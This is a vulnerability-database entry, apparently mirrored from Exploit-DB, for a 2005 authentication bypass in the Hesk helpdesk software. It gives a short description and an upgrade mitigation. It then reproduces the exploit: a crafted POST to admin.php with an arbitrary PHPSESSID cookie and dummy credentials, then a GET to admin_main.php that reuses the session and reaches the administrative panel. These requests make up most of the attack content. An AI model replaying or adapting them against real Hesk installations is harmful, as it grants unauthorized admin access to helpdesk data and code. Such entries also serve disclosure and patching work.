header-logo
Suggest Exploit
vendor:
Hesk
by:
SecurityFocus
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: Hesk
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

Hesk Authentication Bypass Vulnerability

Hesk is prone to an authentication bypass vulnerability. Successful exploitation will grant an attacker administrative access to the application. This can lead to unauthorized access of sensitive data, modification of helpdesk data and program code, and other types of attacks. An attacker can exploit this issue by sending a specially crafted HTTP POST request with a randomly chosen Session ID, followed by a GET request to the administrative control panel.

Mitigation:

Upgrade to the latest version of Hesk.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/14879/info

Hesk is prone to an authentication bypass vulnerability.

Successful exploitation will grant an attacker administrative access to the application. This can lead to unauthorized access of sensitive data, modification of helpdesk data and program code, and other types of attacks. 

1. HTTP POST request with randomly chosen Session ID:
POST admin.php +
("Host: www.example.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7)
Accept: text/xml,application/xml,application/xhtml+xml,text/html
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.example.com/hesk/admin.php
Cookie: PHPSESSID=12345 <!-- Random Session ID--!>
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
user=1&pass=sdfd&a=do_login");

2. GET request to administrative control panel:
GET admin_main.php +
("Host: www.example.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: PHPSESSID=12345") <!-- Session ID --!>

Navigation

Suggest Exploit

Services By CQR